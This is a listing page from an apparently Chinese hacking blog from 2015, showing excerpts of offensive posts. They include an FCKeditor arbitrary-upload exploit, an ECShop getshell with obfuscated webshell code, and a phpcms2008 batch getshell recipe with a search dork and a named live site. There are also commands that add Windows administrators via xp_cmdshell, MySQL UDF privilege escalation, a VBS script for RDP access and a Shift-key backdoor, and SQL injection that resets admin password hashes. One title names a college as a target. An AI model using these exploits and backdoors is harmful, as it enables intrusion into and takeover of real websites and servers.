上一页 1 ··· 18 19 20 21 22
2015年9月28日
fckeditor <= 2.6.4 任意文件上传漏洞
摘要: fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测 <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); de 阅读全文
posted @ 2015-09-28 10:51 小生观察室 阅读(3593) 评论(0) 推荐(0) 编辑
ecshop后台获取shell,通杀最新版本&后台低权限(2011)
摘要: 后台可以提交构造代码绕过过滤,成功解析生成一句话木马. <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60 阅读全文
posted @ 2015-09-28 10:07 小生观察室 阅读(89) 评论(0) 推荐(0) 编辑
2015年9月25日
phpcms2008代码执行 批量getshell EXP
摘要: 使用方法: 谷歌批量搜索 关键字:inurl:yp/product.php exp代码: product.php?}} 找取一个网站:www.slsdgc.com.cn/yp/product.php?catid=721 exp利用方法:www.slsdgc.com.cn/yp/product.php 阅读全文
posted @ 2015-09-25 16:34 小生观察室 阅读(85) 评论(0) 推荐(0) 编辑
检测锦阳师范学院【ewebeditor编辑器】
该文被密码保护。 阅读全文
posted @ 2015-09-25 16:33 小生观察室 阅读(0) 评论(0) 推荐(0) 编辑
1433修复命令
摘要: net user SQLDebugger list /addnet localgroup administrators SQLDebugger /add Error Message:未能找到存储过程 'master..xp_cmdshell'。 修复法:很通用的,其实碰到 其他126 127的都可以 阅读全文
posted @ 2015-09-25 16:22 小生观察室 阅读(1072) 评论(0) 推荐(0) 编辑
mysql5.1 udf提权
摘要: 今儿遇见一个站,支持aspx,但是不定全满,找不到SA,逼迫使用udf提权,但是提权过程里面遇见了一些问题可以导出 然后就去执行神马create function cmdshell returns string soname 'c:\windows\udf.dll'可是悲剧就来了请检查SQL语句Cr 阅读全文
posted @ 2015-09-25 16:17 小生观察室 阅读(201) 评论(0) 推荐(0) 编辑
开3389+非net创建管理用户+Shift后门+自删除脚本vbs
摘要: on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLe 阅读全文
posted @ 2015-09-25 16:07 小生观察室 阅读(202) 评论(0) 推荐(0) 编辑
SQL注入直接修改管理员密码的MD5值
摘要: 经常拿站的黑阔们一定经常碰到,某个网站有注入点,管理员帐号和密码多暴出来了。 可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL) 测试如下: http://www.xxxxxx.com/news.asp?id=121 阅读全文
posted @ 2015-09-25 15:59 小生观察室 阅读(1561) 评论(0) 推荐(0) 编辑
上一页 1 ··· 18 19 20 21 22